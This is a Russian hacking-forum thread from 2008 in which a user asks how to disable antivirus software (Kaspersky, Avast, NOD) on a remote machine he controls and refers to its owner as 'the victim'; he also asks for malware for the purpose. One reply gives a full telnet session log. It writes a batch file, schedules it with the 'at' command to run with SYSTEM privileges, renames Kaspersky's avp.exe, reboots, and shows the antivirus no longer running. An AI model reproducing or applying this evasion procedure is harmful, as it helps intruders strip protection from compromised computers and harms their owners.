Убить антивир

Discussion in 'Безопасность и Анонимность' started by Ra1mer, 17 Sep 2008.

  1. Ra1mer

    Ra1mer New Member

    Joined:
    22 Oct 2007
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    В общем вопрос такой:
    Как можно убить или временно обезвредить антивир имея полный доступ к удаленной машине, ко всем папкам, процессам, шеллу и т.д?? (интересует Аваст. Касперыч, Нод)..
    Ну или посоветуйте какуюнибудь малварину для подобных целей..
    За ранее благодарен.
     
  2. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    полный доступ к удаленной машине c правами администратора?
     
  3. Ra1mer

    Ra1mer New Member

    Joined:
    22 Oct 2007
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Да..
     
  4. AntX

    AntX New Member

    Joined:
    2 Jun 2008
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    Для Каспера есть специальная утилита- KAV/KIS Remover. Найти ее можно на сайте касперского.
     
  5. paulzey

    paulzey Elder - Старейшина

    Joined:
    30 Oct 2007
    Messages:
    52
    Likes Received:
    16
    Reputations:
    5
    Практически универсальный способ - переименовать исполняемый файл и перезагрузиться.
     
  6. D1mka

    D1mka Elder - Старейшина

    Joined:
    2 Jan 2008
    Messages:
    123
    Likes Received:
    14
    Reputations:
    2
    не получится переименовать, т.к. защищен
     
  7. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    у обычных антивирусов можно просто грохнуть процесс/сервис и потом отрубить автозагрузку.
    с каспером сложнее )
     
  8. Ra1mer

    Ra1mer New Member

    Joined:
    22 Oct 2007
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    В самом начале пробовал и на Ноде и на Авасте, процессы/сервисы не мрут) Тутже выплывают новые, либо так и стоят.. С автозагрузкой тоже самое..
    Спасиб, над будет юзнуть.. Но если он представляет собой простой унинсталл то не получится, мышкой за жертву я "ок" нажимать не обладаю..
    Ушел пробовать..
    --
    Не.. Защищен, не хочет.
     
    #8 Ra1mer, 18 Sep 2008
    Last edited: 18 Sep 2008
  9. Ra1mer

    Ra1mer New Member

    Joined:
    22 Oct 2007
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    По прежнему ищу выход)
     
  10. paulzey

    paulzey Elder - Старейшина

    Joined:
    30 Oct 2007
    Messages:
    52
    Likes Received:
    16
    Reputations:
    5
    Естественно, потому как просто админовских прав недостаточно. Подразумевалось, что пользователь сам способен поднять права.
    Демонстрирую небольшой лог моей telnet-сессии, как оное должно быть (с мини-комментариями, выделены зелёным, если надо полнее - отпишусь).
    Система - Windows XP Pro Sp2, KAV 7.0, потенциально будет работать и на других антивирусах.

    C:\>tasklist

    Code:
    Имя образа                   PID Имя сессии       № сеанса       Память
    ========================= ====== ================ ======== ============
    System Idle Process            0 Console                 0        28 КБ
    System                         4 Console                 0       264 КБ
    smss.exe                     548 Console                 0       436 КБ
    csrss.exe                    700 Console                 0     3 668 КБ
    winlogon.exe                 724 Console                 0     4 688 КБ
    services.exe                 888 Console                 0     3 196 КБ
    lsass.exe                    900 Console                 0     1 388 КБ
    svchost.exe                 1104 Console                 0     4 852 КБ
    svchost.exe                 1240 Console                 0     4 324 КБ
    svchost.exe                 1368 Console                 0    21 720 КБ
    svchost.exe                 1580 Console                 0     3 376 КБ
    svchost.exe                 1620 Console                 0     4 816 КБ
    spoolsv.exe                 1840 Console                 0     4 784 КБ
    avp.exe                     2024 Console                 0     7 820 КБ
    tlntsvr.exe                  272 Console                 0     2 824 КБ
    alg.exe                      912 Console                 0     3 528 КБ
    explorer.exe                1504 Console                 0    12 896 КБ
    [COLOR=Red]avp.exe                     1788 Console                 0     6 332 КБ[/COLOR]
    ctfmon.exe                  1876 Console                 0     2 992 КБ
    tlntsess.exe                1032 Console                 0     3 768 КБ
    cmd.exe                     1320 Console                 0     1 608 КБ
    tasklist.exe                1148 Console                 0     3 124 КБ
    wmiprvse.exe                 760 Console                 0     5 428 КБ
    Как видно, в процессах есть. Ищем папку, пытаемся переименовать.

    C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>move avp.exe avp.ex_
    Отказано в доступе.

    Ожидаемый и печальный эффект, поднимаем права до Local System.

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>cd \

    C:\>copy con kill_avp.bat
    @echo off
    cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
    move avp.exe avp.ex_
    ^Z
    Скопировано файлов: 1.

    C:\>type kill_avp.bat
    @echo off
    cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
    move avp.exe avp.ex_

    C:\>time
    Текущее время: 18:19:05,92
    Введите новое время:

    C:\>at 18:20 c:\kill_avp.bat
    Добавлена новая задача с кодом 1

    C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.exe
    Том в устройстве C не имеет метки.
    Серийный номер тома: D007-EFC9

    Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

    28.06.2007 12:58 10 560 rescue32.exe
    1 файлов 10 560 байт
    0 папок 1 244 950 528 байт свободно

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.ex_
    Том в устройстве C не имеет метки.
    Серийный номер тома: D007-EFC9

    Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

    28.06.2007 12:51 218 376 avp.ex_
    1 файлов 218 376 байт
    0 папок 1 244 950 528 байт свободно

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>

    Ну вот, собственно говоря, и всё.

    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>shutdown -r -t 0

    сообщение от администратора в PAUL, 24.09.2008 18:25:55

    The computer is shutting down......

    Подключение к узлу утеряно.

    Вторая сессия:

    C:\Documents and Settings\admin>tasklist

    Code:
    Имя образа                   PID Имя сессии       № сеанса       Память
    ========================= ====== ================ ======== ============
    System Idle Process            0 Console                 0        28 КБ
    System                         4 Console                 0       264 КБ
    smss.exe                     552 Console                 0       384 КБ
    csrss.exe                    704 Console                 0     3 220 КБ
    winlogon.exe                 728 Console                 0     9 352 КБ
    services.exe                 892 Console                 0     2 828 КБ
    lsass.exe                    904 Console                 0     5 692 КБ
    svchost.exe                 1108 Console                 0     4 452 КБ
    svchost.exe                 1256 Console                 0     4 020 КБ
    svchost.exe                 1380 Console                 0    17 056 КБ
    logonui.exe                 1392 Console                 0     3 508 КБ
    svchost.exe                 1528 Console                 0     3 128 КБ
    svchost.exe                 1588 Console                 0     3 764 КБ
    spoolsv.exe                 1872 Console                 0     4 396 КБ
    tlntsvr.exe                  348 Console                 0     2 608 КБ
    alg.exe                      780 Console                 0     3 276 КБ
    tlntsess.exe                 788 Console                 0     3 536 КБ
    wuauclt.exe                 1232 Console                 0     6 436 КБ
    cmd.exe                     1360 Console                 0     1 320 КБ
    tasklist.exe                1656 Console                 0     3 112 КБ
    wmiprvse.exe                1688 Console                 0     5 404 КБ
    Any more questions?
     
    1 person likes this.
  11. 0verbreaK

    0verbreaK Elder - Старейшина

    Joined:
    30 Apr 2008
    Messages:
    318
    Likes Received:
    42
    Reputations:
    -3
    Any more questions?

    это по какому?